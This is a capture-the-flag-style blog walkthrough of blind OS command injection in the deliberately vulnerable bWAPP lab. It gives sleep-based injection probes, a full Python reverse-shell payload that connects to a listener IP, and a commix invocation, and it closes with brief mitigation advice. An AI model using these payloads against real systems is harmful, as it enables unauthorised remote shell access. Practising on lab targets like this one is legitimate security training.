bWAPP - OS Command Injection (Blind)

bWAPP – OS Command Injection (Blind)

In this walk through, we will be going through the OS Command Injection (Blind) vulnerability section from bWAPP Labs. We will be exploring and exploiting Blind OS Command Injection in DNS Lookup functionality and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

OS Command Injection (Blind)

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application has a command box which is used to ping an ip address. On intercepting the request via Burpsuite, we can see that it is using POST request with our supplied parameter to commandi_blind.php file. As this is a Blind OS command injection challenge we will not getting any output.

OS Command Injection - Blind

Burpsuite intercept

  • I used the below payload to test the Blind command injection and it worked. The application got hanged for 5 seconds as per our supplied input.

127.0.0.1 | sleep 5

payload

  • Let’s exploit the server and get a reverse shell using the below payload.

127.0.0.1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

payload

netcat listener

Security: Medium

  • Setting the security level to Medium.

Security level medium

  • I used the same payload to test the Blind command injection and it worked. The application got hanged for 5 seconds as per our supplied input.

127.0.0.1 | sleep 5

payload

  • I used various payloads however was unable to get the reverse shell manually. So, i used commix and it worked.

python3 commix.py -u "http://localhost/commandi_blind.php" --cookie="PHPSESSID=k6h767b8c040u52pi5hc0ilai1; security_level=1" --data="target=127.0.0.1&form=submit"

commix shell

Security: High

  • Setting the security level to High.

Security level high

  • I used the below payload however none of them worked. So, i tried exploitation with commix and it did not worked too.

127.0.0.1 ; sleep 5
127.0.0.1 & sleep 5
127.0.0.1 | sleep 5
127.0.0.1 || sleep 5
127.0.0.1 && sleep 5

payload

commix output

Also Read: bWAPP – Old, Backup & Unreferenced files

Conclusion:

Conclusion

So, we finally completed all the security levels for the bWAPP OS Command Injection (Blind) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Blind OS Command Injection attacks can be mitigated by completely avoiding OS commands from application-layer code and performing input sanitization on the user input where necessary. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top